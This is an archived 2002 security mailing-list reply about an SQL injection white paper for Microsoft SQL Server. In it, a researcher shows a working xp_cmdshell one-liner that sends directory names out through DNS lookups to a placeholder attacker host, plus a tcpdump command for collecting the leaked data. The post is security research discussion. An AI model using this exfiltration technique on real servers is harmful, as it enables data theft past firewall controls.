Re: Manipulating Microsoft SQL Server Using SQL Injection (+ DNS Tunnels) (fwd)

From: Haroon Meer (haroonat_private)
Date: Tue Sep 03 2002 - 03:07:00 PDT

    Hi.

    Nice paper :> We have found that outgoing connections are almost always
    blocked (especially from SQL servers that are a little deeper in the DMZ
    than the 'net facing webservers). (DNS requests often slip by)

    If you can execute commands remotely (through ur xp_ of choice) then you
    can use batch commands to throw together a simple DNS tunnel.

    Example..
    -snip-
    exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir
    c:\*.`) do (nslookup %l. YOUR_IP_HERE)'

    Running a sniffer on host YOUR_IP_HERE (with an awk / split or two)

    Wh00t:~# tcpdump -l dst YOUR_IP_HERE and port 53 | awk '{print $7}'

    .
    WINNT.
    tools.
    bytes

    -snip-

    If outgoing dns isnt allowed directly, you can still have some joy
    requesting %variable.DOMAIN_U_CAN_SNIFF.com and letting it follow its DNS
    path..

    Haroon Meer                                                         MH
    SensePost Information Security                          +27 83786 6637
    PGP : http://www.sensepost.com/pgp/haroon.txt     haroonat_private

    On Wed, 28 Aug 2002, Aaron C. Newman wrote:

    > Hi All,
    >
    > I just posted a short white paper on Microsoft SQL Server and SQL
    > Injection titled "Manipulating Microsoft SQL Server Using SQL Injection"
    > at:
    >
    > http://www.appsecinc.com/news/briefing.html#inject14
    >
    > The paper was written and researched by Cesar Cerrudo
    > (sqlsecat_private).
    >
    > All comments are welcome.
    >
    > Regards,
    > Aaron
    > _______________________________
    > Aaron C. Newman
    > anewmanat_private
    > CTO/Founder
    > Application Security, Inc.
    > www.appsecinc.com
    > Phone: 212-490-6022
    > Fax: 212-490-6456
    > - Protection Where It Counts -

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/